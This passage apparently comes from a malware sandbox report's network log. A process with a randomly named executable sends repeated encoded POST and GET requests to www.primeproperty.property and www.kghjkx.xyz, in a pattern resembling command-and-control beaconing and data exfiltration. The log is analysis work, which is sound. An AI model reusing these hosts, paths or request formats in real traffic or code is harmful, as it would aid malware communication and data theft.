Nov 11, 2024 08:33:13.029171944 CET	717	IN	HTTP/1.1 404 Not Found Server: openresty/1.25.3.2 Date: Mon, 11 Nov 2024 07:33:12 GMT Content-Type: text/html Content-Length: 561 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50032	113.20.119.31	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:14.699512005 CET	840	OUT	POST /c1ti/ HTTP/1.1 Host: www.primeproperty.property Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.primeproperty.property Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.primeproperty.property/c1ti/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 5a 4c 30 51 4a 63 62 33 36 64 69 5a 52 4e 6a 45 30 64 77 33 52 2f 6b 2f 4b 4d 41 71 47 4c 6c 58 6d 34 65 71 6b 64 47 2f 34 66 31 6a 6f 2b 72 4c 33 4a 45 30 71 50 78 70 45 5a 76 4e 75 4f 71 52 6a 64 75 53 6d 51 72 69 58 6b 30 54 57 62 6a 2f 42 66 4d 41 6a 6f 49 73 46 66 39 62 72 2f 72 78 78 49 6c 36 64 67 76 5a 59 30 41 6d 41 2f 59 2f 43 4a 61 4b 37 4f 6c 6f 58 32 4f 4d 7a 35 45 41 69 57 6f 77 74 34 62 38 67 51 34 32 7a 45 56 4f 6d 78 50 35 45 59 75 56 57 35 4e 36 39 69 2f 5a 61 77 73 6b 65 4c 42 52 41 57 69 69 59 3d Data Ascii: Ir8HUj=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSZL0QJcb36diZRNjE0dw3R/k/KMAqGLlXm4eqkdG/4f1jo+rL3JE0qPxpEZvNuOqRjduSmQriXk0TWbj/BfMAjoIsFf9br/rxxIl6dgvZY0AmA/Y/CJaK7OloX2OMz5EAiWowt4b8gQ42zEVOmxP5EYuVW5N69i/ZawskeLBRAWiiY=
Nov 11, 2024 08:33:15.568097115 CET	717	IN	HTTP/1.1 404 Not Found Server: openresty/1.25.3.2 Date: Mon, 11 Nov 2024 07:33:15 GMT Content-Type: text/html Content-Length: 561 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	50033	113.20.119.31	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:17.321186066 CET	10922	OUT	POST /c1ti/ HTTP/1.1 Host: www.primeproperty.property Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.primeproperty.property Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.primeproperty.property/c1ti/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 42 4c 30 69 52 63 5a 57 36 64 6a 5a 52 4e 71 6b 30 41 77 33 52 59 6b 37 75 49 41 72 36 39 6c 56 65 34 59 4a 73 64 54 36 4d 66 2f 6a 6f 2b 30 62 33 45 62 6b 71 57 78 70 55 56 76 4e 2b 4f 71 52 6a 64 75 51 75 51 73 32 44 6b 32 54 57 55 6b 2f 42 44 49 41 6a 51 49 73 64 50 39 62 66 76 6f 42 52 49 67 72 74 67 38 62 41 30 63 32 41 78 55 66 44 61 61 4b 6e 52 6c 6f 4c 63 4f 49 37 44 45 48 4b 57 71 6c 51 2f 47 49 74 4f 76 55 6a 4b 4f 75 71 38 41 75 77 76 6e 69 6d 54 4d 62 68 70 72 4b 71 6b 32 47 37 68 59 51 49 53 31 56 41 76 57 48 4a 41 36 4b 54 34 57 37 65 62 31 59 30 49 64 69 50 6f 55 46 35 4c 6d 74 2f 41 4e 75 4c 42 68 61 6d 6c 33 62 52 57 31 75 79 58 4e 59 37 32 62 59 75 49 77 79 58 69 74 77 31 75 44 68 6e 4e 77 47 50 7a 44 4c 61 41 53 37 59 36 58 55 73 67 56 75 30 6e 74 63 47 63 56 79 4c 36 46 62 36 69 4b 6e 56 69 5a 78 6b 43 54 63 4e 4b 4b 50 54 43 72 2f 46 [TRUNCATED] Data Ascii: Ir8HUj=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSBL0iRcZW6djZRNqk0Aw3RYk7uIAr69lVe4YJsdT6Mf/jo+0b3EbkqWxpUVvN+OqRjduQuQs2Dk2TWUk/BDIAjQIsdP9bfvoBRIgrtg8bA0c2AxUfDaaKnRloLcOI7DEHKWqlQ/GItOvUjKOuq8AuwvnimTMbhprKqk2G7hYQIS1VAvWHJA6KT4W7eb1Y0IdiPoUF5Lmt/ANuLBhaml3bRW1uyXNY72bYuIwyXitw1uDhnNwGPzDLaAS7Y6XUsgVu0ntcGcVyL6Fb6iKnViZxkCTcNKKPTCr/Fp2gINyFyvEZLJehskn+LUsd3r7EEXcpYO/FPiQz+4tLJh8WpnsABiS17kpqo+j6PrXzVtUob011EpT/8DxCULg6UcMfk1oiJFCl2AM9M6p0IE/kAXE25VCoBDbNPeUPo6rf6I6/tfnwJjG9TaI2y7v9cfByddXBIWvo7rEB0qqp3RrjLJr2nRGbhbyeoEst+Iop3kl6E44idD9RnJdOCIQyocCq0M+IeyMZawlESoCbBBkz2D57JhSmwpOAk7KORAaJC2rfWrtU4F420XiZ0Wy8Gv3C8WOJ4eviUlDcJmwbNr+T27Yrwa9w6ajTj5oswG0KUtk12HJAWvGNnem3aS24fhZQV/X1NCWXa/+u3oaizNMsWmqEyUUtMUG6uDfxCIfWnOG3w0L8kV+bNpYYSeu8te87E48XyQu0gQUpyJhCKH16LwELMuL7J2e4VOnmwRllZt5kU9rV0qjnbwb9S07s46iAxO+CfMYwWzySeMeTz6lfJmDZ1TxwNN0H9FYHuDGVdkDrEMzwx3gblkWFoGDlrXibqq8vFirB4YTuApCTJduxTjmnJWHxowl2NwOlNSY0d3W8MupuFPWHy+MMbfXIyRCxAY4nQ8zmcnQJ/9JRLH3GTEjeVEIqWdt8XSiZlN2ccu3Cfmjdazfx3cyxOEj94Z/qgWpCPfC [TRUNCATED]
Nov 11, 2024 08:33:18.127422094 CET	717	IN	HTTP/1.1 404 Not Found Server: openresty/1.25.3.2 Date: Mon, 11 Nov 2024 07:33:17 GMT Content-Type: text/html Content-Length: 561 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	50034	113.20.119.31	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:19.934144974 CET	543	OUT	GET /c1ti/?gRU0e=jXFT04FhvBZ8j0BP&Ir8HUj=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs= HTTP/1.1 Host: www.primeproperty.property Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:33:20.751812935 CET	717	IN	HTTP/1.1 404 Not Found Server: openresty/1.25.3.2 Date: Mon, 11 Nov 2024 07:33:20 GMT Content-Type: text/html Content-Length: 561 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	47.129.103.185	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:26.437165022 CET	784	OUT	POST /usop/ HTTP/1.1 Host: www.kghjkx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.kghjkx.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.kghjkx.xyz/usop/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 6d 4d 54 34 47 57 6d 5a 37 31 55 6e 4d 71 42 51 33 4c 5a 51 35 41 5a 36 7a 4f 5a 61 4b 6e 30 53 2f 51 63 62 50 6e 61 52 51 46 4f 75 54 39 48 46 75 57 35 39 73 53 65 74 6c 4a 72 6b 30 49 50 4d 73 48 63 44 30 41 78 4f 6c 45 66 42 73 4f 4c 57 79 35 69 74 55 77 57 2b 2f 74 32 4c 57 59 2b 67 65 31 75 61 75 68 63 31 76 4d 42 55 39 75 38 36 47 39 6d 72 4e 79 68 4d 45 5a 64 38 47 65 30 64 53 37 64 31 46 6b 43 6c 2b 52 65 5a 39 6a 34 41 48 41 64 44 43 45 6e 61 58 38 6a 68 50 6c 4e 4a 4a 51 47 55 2b 7a 54 73 32 53 61 56 47 71 76 2b 54 73 6e 2f 77 3d 3d Data Ascii: Ir8HUj=6Ez30ZWXMUnDmmMT4GWmZ71UnMqBQ3LZQ5AZ6zOZaKn0S/QcbPnaRQFOuT9HFuW59sSetlJrk0IPMsHcD0AxOlEfBsOLWy5itUwW+/t2LWY+ge1uauhc1vMBU9u86G9mrNyhMEZd8Ge0dS7d1FkCl+ReZ9j4AHAdDCEnaX8jhPlNJJQGU+zTs2SaVGqv+Tsn/w==
Nov 11, 2024 08:33:27.281430960 CET	398	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 11 Nov 2024 07:33:27 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kghjkx.xyz/usop/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	47.129.103.185	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:28.985150099 CET	804	OUT	POST /usop/ HTTP/1.1 Host: www.kghjkx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.kghjkx.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.kghjkx.xyz/usop/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 33 30 53 66 67 63 61 4c 4c 61 63 77 46 4f 68 7a 39 47 47 65 57 79 39 74 76 68 74 6e 64 72 6b 30 63 50 4d 70 37 63 66 54 55 2b 50 31 45 64 4f 4d 4f 4a 63 53 35 69 74 55 77 57 2b 2f 35 63 4c 57 77 2b 67 72 6c 75 61 4c 56 66 32 76 4d 43 54 39 75 38 72 32 39 59 72 4e 79 50 4d 42 6c 37 38 44 61 30 64 53 72 64 30 55 6b 42 76 2b 52 45 47 74 69 49 54 47 70 5a 4b 68 56 75 62 6d 6f 2b 2b 72 51 72 42 76 64 63 46 50 53 45 2b 32 32 70 49 42 6a 62 7a 51 52 75 6b 36 31 36 4e 64 42 66 44 58 57 55 45 44 6e 66 68 6d 58 6c 7a 75 6f 3d Data Ascii: Ir8HUj=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac30SfgcaLLacwFOhz9GGeWy9tvhtndrk0cPMp7cfTU+P1EdOMOJcS5itUwW+/5cLWw+grluaLVf2vMCT9u8r29YrNyPMBl78Da0dSrd0UkBv+REGtiITGpZKhVubmo++rQrBvdcFPSE+22pIBjbzQRuk616NdBfDXWUEDnfhmXlzuo=
Nov 11, 2024 08:33:29.837021112 CET	398	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 11 Nov 2024 07:33:29 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kghjkx.xyz/usop/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50037	47.129.103.185	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:31.528465033 CET	10886	OUT	POST /usop/ HTTP/1.1 Host: www.kghjkx.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.kghjkx.xyz Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.kghjkx.xyz/usop/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 2f 30 53 75 41 63 56 4b 4c 61 54 51 46 4f 6f 54 39 62 47 65 57 76 39 74 32 6f 74 6e 51 65 6b 79 51 50 65 62 44 63 54 79 55 2b 45 31 45 64 46 73 4f 4b 57 79 34 36 74 55 67 53 2b 2f 70 63 4c 57 77 2b 67 73 64 75 64 65 68 66 36 50 4d 42 55 39 75 77 36 47 39 6a 72 4a 65 35 4d 41 52 4e 37 33 75 30 45 7a 62 64 33 6d 38 42 6e 2b 52 61 46 74 69 51 54 47 31 57 4b 6e 78 49 62 6d 63 45 2b 73 34 72 43 4a 52 4b 41 75 43 2b 6e 46 69 45 56 43 62 34 79 67 45 6f 6a 59 56 47 63 39 35 46 58 44 6a 35 50 54 57 33 2b 58 4c 6c 6e 62 64 67 49 43 30 71 46 32 77 7a 6d 31 51 30 32 53 46 52 36 39 54 38 63 58 47 5a 61 75 6d 6c 6c 73 33 47 74 47 42 4e 63 4b 39 52 49 5a 4c 4c 39 48 6a 35 50 2b 36 5a 6f 6d 57 41 79 4b 78 5a 38 4b 65 7a 64 43 57 54 51 6f 51 42 79 4d 41 43 69 33 48 36 47 4f 6a 7a 79 49 43 59 79 6e 33 33 6f 43 46 70 43 57 4c 79 35 74 54 6a 6d 45 33 68 69 66 4a 76 78 39 5a [TRUNCATED] Data Ascii: Ir8HUj=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac/0SuAcVKLaTQFOoT9bGeWv9t2otnQekyQPebDcTyU+E1EdFsOKWy46tUgS+/pcLWw+gsdudehf6PMBU9uw6G9jrJe5MARN73u0Ezbd3m8Bn+RaFtiQTG1WKnxIbmcE+s4rCJRKAuC+nFiEVCb4ygEojYVGc95FXDj5PTW3+XLlnbdgIC0qF2wzm1Q02SFR69T8cXGZaumlls3GtGBNcK9RIZLL9Hj5P+6ZomWAyKxZ8KezdCWTQoQByMACi3H6GOjzyICYyn33oCFpCWLy5tTjmE3hifJvx9Z8PAV56RKkAr0Vqalbhd1wkZUwhXJpBEOAovvMk/v+N5nhFd9Zv4bUJ584oeNPWqI9rtN7BgLQ9p4PJjsl/itDOlS/bJVaPLEHpC3r7Nly+cGuSnc5r360xPjXSLYQ1+aFj+9tkpuHlznJJ9UbwfqZQdJ0b6asMEt+XI0JeLfNZVDfpjwXosOqIEXjlB9imB6r1ONmvgorO4z91qpO5HswmVWmTVAUaWaYORzdeP98Jkfnki9rb2Y/h22P5kQYgoqIpri3J0T9KVw8wtIxGgR2km92RQDaTOyWoQFnLZWPHNORUIuWSvwwkSlGbY+PUGsR6CzW0pBcEAOIEDvPNSHSZJ43cBw9n82URMHGrejw1iQcSPfwLf8T4ox2boRkmSiCS89LU0yPaUEkGEgecfi50bIuUxnP31YrCl9oEvtBVXCcEvZqzixGb5PO7NUWZv5FXAjkWFNGc20RKZucH27DF2PwM38NZgH/tw7KcuMLKuhYYKnHHRmkx1vpFp2XW4xof9FzffgZzvDxWoHbBgYgzauHb1BUhSlJKUZ8w6ppswyedaZKg/8FIn+zQzJhjDDvxs/MjziwDfkgua7F3K7WCgBZ95uLrNj0DUX4eC4PTx0jCP9P4NqxPDen7Xs0e6/vhnd4kGSIGPTYa325IVtEGlLGc3vEv7v2b [TRUNCATED]
Nov 11, 2024 08:33:32.378504992 CET	398	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 11 Nov 2024 07:33:32 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.kghjkx.xyz/usop/ Strict-Transport-Security: max-age=31536000 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved 